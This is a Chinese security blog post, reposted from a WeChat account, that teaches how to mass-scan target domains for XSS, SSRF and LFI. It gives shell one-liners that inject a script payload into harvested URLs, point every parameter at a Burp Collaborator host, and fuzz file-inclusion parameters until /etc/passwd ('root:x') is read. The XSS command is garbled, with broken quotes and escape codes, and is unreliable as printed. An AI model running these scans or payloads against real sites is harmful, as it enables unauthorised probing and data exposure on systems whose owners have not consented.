使用工具快速发现 SSRF、LFI、XSS

admin 2024年9月28日12:18:08评论14 views字数 913阅读3分2秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

文章首发于个人博客:https://mybeibei.net,点击最下方“阅读原文”可直接跳转查看。

背景介绍

本文将告诉你如何使用 gf、httpx、waybackurls、qsreplace、gau 工具快速找到 SSRF、XSS 和 LFI 漏洞。废话不多说,开始!

XSS

首先将使用 gf、httpx、waybackurls、qsreplace这些工具来寻找XSS漏洞,命令如下:

cat file.txt| gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>|while read host do;do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)&& echo “$host 33[0;31mVulnerablen”;done

generic

224 Bytes

© Guge's Blog

使用工具快速发现 SSRF、LFI、XSS

以上命令可以在指定目标域中发现XSS漏洞。

SSRF

命令:

findomain -t example.com -q | httpx -silent -threads 1000| gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

generic

119 Bytes

© Guge's Blog

使用工具快速发现 SSRF、LFI、XSS

上述命令将过滤 SSRF 的参数,并将请求发送给到burpcollaborator。

LFI

命令:

findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ |while read url ;do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt; done

generic

143 Bytes

© Guge's Blog

使用工具快速发现 SSRF、LFI、XSS

你学废了么?

感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~

====正文结束====

原文始发于微信公众号(骨哥说事):使用工具快速发现 SSRF、LFI、XSS

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:18:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用工具快速发现 SSRF、LFI、XSShttps://cn-sec.com/archives/1990048.html

发表评论

匿名网友 填写信息